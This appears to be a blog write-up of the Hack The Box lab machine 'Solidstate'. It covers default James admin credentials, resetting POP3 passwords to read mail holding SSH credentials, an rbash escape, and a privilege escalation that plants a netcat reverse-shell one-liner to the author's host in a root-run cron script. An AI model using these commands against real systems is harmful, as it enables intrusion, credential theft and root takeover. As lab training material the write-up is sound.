---
title: "HTB: Solidstate"
date: 2021-07-23
classes: wide
categories:
  - Hackthebox
tag:
  - james remote administration tool   
  - file misconfiguration 
  - restricted shell escape
  - ssh
  - pop3 
  - mail service
toc: true
---

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/solidstate/solidstate.png" alt="">

# Summary

Solidstate was a fun linux machine that first involved finding default credentials to James remote administration tool which allows you to reset the pop3 passwords for users. After you login to pop3 as a user and find ssh credentials. Logging into ssh as this user shows that there is a restricted shell, so you need to breakout of that restricted shell by ssh'ing without loading the "rc" profile. Once here you then notice a file /opt/tmp.py which pspy shows is being run every 5 minutes by root. However Mindy can write to this file that is being executed as root, meaning you can put a reverse shell into the python file and it will be executed with root privileges. Without further or do lets get into solidstate from hackthebox  


# Recon

```
$cat nmap/initial.txt 
# Nmap 7.91 scan initiated Fri Jul 23 16:26:42 2021 as: nmap -A -oN nmap/initial.txt 10.10.10.51
Nmap scan report for 10.10.10.51
Host is up (0.065s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp  open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.16.91 [10.10.16.91]), 
110/tcp open  pop3    JAMES pop3d 2.3.2
119/tcp open  nntp    JAMES nntpd (posting ok)
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 23 16:28:37 2021 -- 1 IP address (1 host up) scanned in 114.54 seconds
```

And then an all port scan

```
$cat nmap/all-ports.txt 
# Nmap 7.91 scan initiated Fri Jul 23 16:31:26 2021 as: nmap -p- --min-rate 10000 -oN nmap/all-ports.txt 10.10.10.51
Nmap scan report for 10.10.10.51
Host is up (0.021s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip

# Nmap done at Fri Jul 23 16:31:31 2021 -- 1 IP address (1 host up) scanned in 4.80 seconds
```

# Enumeration of Services

## RSIP 4555

Doing a banner grab for this port showed that it was running James Administration tool 2.3.2 

```
$nc -nvC $ip 4555
(UNKNOWN) [10.10.10.51] 4555 (?) open
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
```

Looking for vulnerabilities related to this version showed that there was a remote code execution vulnerability for this version <https://www.exploit-db.com/exploits/35513> 

Reading this exploit script showed that the default credentials was root:root trying these creds gave me access to the console 

```
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
```
With this access I then ran HELP to show commands and I could list users with listusers

```
user: james
user: thomas
user: john
user: mindy
user: mailadmin
```
I also saw there was a setpassword command which I then used to reset each accounts password to "abc"

# Mindy

Next I attempted to get access to the pop3 service with the user accounts I just reset and it worked

```
$telnet $ip 110     
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready  
USER mindy
+OK                                                                                                                    
PASS abc                                                                                                               
+OK Welcome mindy
```

I then used LIST to list see if any of the users had mail and there was an interesting mail inside Mindy's mailbox

```
Dear Mindy,              
                                                                                                                       
                                                           
Here are your ssh credentials to access the system. Remember to reset your password after your first login.            
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.   
                                                           
username: mindy
pass: P@55W0rd1!2@
                                                           
Respectfully,
James
```

I then used these credentials to get access to ssh.

# Mindy restricted shell escape

Next I noticed that some commands didn't work as Mindy

```
mindy@solidstate:~$ whoami
-rbash: whoami: command not found
```

I was in a rbash shell it seemed. Echoing the path variable showed that I could run the commands in /home/mindy/bin

```
mindy@solidstate:~$ echo $PATH
/home/mindy/bin
```

Doing an ls on this directory showed that I only had access to cat env and ls.

So there is this really good powerpoint presentation <https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells> which goes into good detail into how to escape restricted shells. Following along with the suggestions on this powerpoint one of them was to run ssh without loading the "rc" profile. Running ssh with the flag as follows escapes us from the restricted shell

```
$ssh mindy@$ip -t "bash --noprofile"
mindy@10.10.10.51's password: 
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/games
```


# Mindy =>Root

Linpeas didn't find anything useful, so I started enumerating the system and noticed a file called tmp.py in /opt with the following content

```
cat tmp.py 
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()
```

Looking at the permissions for this file showed that Mindy had write permissions to this file

```
-rwxrwxrwx  1 root root  105 Aug 22  2017 tmp.py
```

I then transferred pspy32 to the remote machine and saw that root user was executing this script every 5 minutes

```
--snipped--
2021/07/23 12:21:01 CMD: UID=0    PID=20736  | /usr/sbin/CRON -f                                                                                                                                                                              
2021/07/23 12:21:01 CMD: UID=0    PID=20737  | /bin/sh -c python /opt/tmp.py                                                                                                                                                                  
2021/07/23 12:21:01 CMD: UID=0    PID=20738  | python /opt/tmp.py 
--snipped--
```

I then added a line below import sys and added my reverse shell 
```
    #!/usr/bin/env python
import os
import sys
os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.91 4444 >/tmp/f')
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()
```

I then waited 5 minutes for root to execute this script and it then sent a reverse shell to my local kali machine

```
$nc -lvp 4444
listening on [any] 4444 ...
10.10.10.51: inverse host lookup failed: Unknown host
connect to [10.10.16.91] from (UNKNOWN) [10.10.10.51] 56640
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
```